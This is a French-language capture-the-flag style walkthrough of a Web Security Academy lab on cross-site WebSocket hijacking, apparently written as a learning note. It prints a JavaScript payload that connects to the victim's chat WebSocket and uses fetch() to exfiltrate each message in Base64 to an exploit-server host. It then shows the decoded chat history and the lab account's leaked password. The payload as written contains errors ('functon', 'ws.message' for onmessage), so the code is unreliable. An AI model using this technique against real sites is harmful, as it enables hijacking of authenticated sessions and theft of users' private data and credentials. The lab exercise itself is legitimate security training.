Détournement de WebSocket inter-sites

Cross-site WebSocket hijacking

Lab: Cross-site WebSocket hijacking | Web Security AcademyWebSecAcademy

L’application est une boutique en ligne disposant d’une fonctionnalité de chat en direct implémentée à l’aide de WebSockets. À chaque visite de la page de chat, l’intégralité de l’historique de la conversation est automatiquement chargée, sans contrôle strict de l’origine de la requête.

Les messages échangés utilisent le format JSON suivant :

{
    "user":"You",
    "content":"hi"
}

Exfiltrer l’historique du chat de la victime via une attaque de détournement de WebSocket inter-sites, puis utiliser les informations récupérées pour accéder à son compte.

Principe de l’attaque

L’Exploit Server est utilisé pour héberger un payload HTML/JavaScript qui :

Établit une connexion WebSocket vers le serveur de chat cible.
Envoie le message requis pour initialiser la communication (READY).
Intercepte tous les messages reçus via le WebSocket.
Exfiltre ces messages vers l’Exploit Server après encodage en Base64.

Payload utilisé

Un fichier data.js est créé avec le contenu suivant :

<script>
var ws = new WebSocket("https://0aad0050046d2085eafd2fe700400041.web-security-academy.net/chat");
ws.onopen = functon() {
ws.send("READY");
};
ws.message = function(event) {
fetch("https://exploit-0ac70073043f200fea802ec601950065.exploit-server.net/?data=" + btoa(event.data));
};
</script>

Ce script s’exécute dans le navigateur de la victime lorsqu’elle visite l’Exploit Server et exploite automatiquement sa session authentifiée.

Données exfiltrées

Le serveur d’exploitation reçoit plusieurs chaînes encodées en Base64, par exemple :

eyJ1c2VyIjoiSGFsIFBsaW5lIiwiY29udGVudCI6IkhlbGxvLCBob3cgY2FuIEkgaGVscD8ifQ==
eyJ1c2VyIjoiWW91IiwiY29udGVudCI6IkkgZm9yZ290IG15IHBhc3N3b3JkIn0=
eyJ1c2VyIjoiSGFsIFBsaW5lIiwiY29udGVudCI6Ik5vIHByb2JsZW0gY2FybG9zLCBpdCZhcG9zO3MgYmlqajlrNjFtOGJqdjE4dWc2N3UifQ==
eyJ1c2VyIjoiWW91IiwiY29udGVudCI6IlRoYW5rcywgSSBob3BlIHRoaXMgZG9lc24mYXBvczt0IGNvbWUgYmFjayB0byBiaXRlIG1lISJ9
eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9

Après décodage, l’historique complet du chat est reconstitué :

{"user":"Hal Pline","content":"Hello, how can I help?"}
{"user":"You","content":"I forgot my password"}
{"user":"Hal Pline","content":"No problem carlos, it&apos;s bijj9k61m8bjv18ug67u"}
{"user":"You","content":"Thanks, I hope this doesn&apos;t come back to bite me!"}
{"user":"CONNECTED","content":"-- Now chatting with Hal Pline --"}

Résultat

Les informations sensibles récupérées permettent d’identifier les identifiants de la victime :

Utilisateur : carlos
Mot de passe : bijj9k61m8bjv18ug67u

Ces identifiants peuvent ensuite être utilisés pour se connecter au compte de Carlos et valider le laboratoire.

Mis à jour il y a 2 mois

hashtagCross-site WebSocket hijacking

hashtagPrincipe de l’attaque

hashtagPayload utilisé

hashtagDonnées exfiltrées

hashtagRésultat

Cross-site WebSocket hijacking

Principe de l’attaque

Payload utilisé

Données exfiltrées

Résultat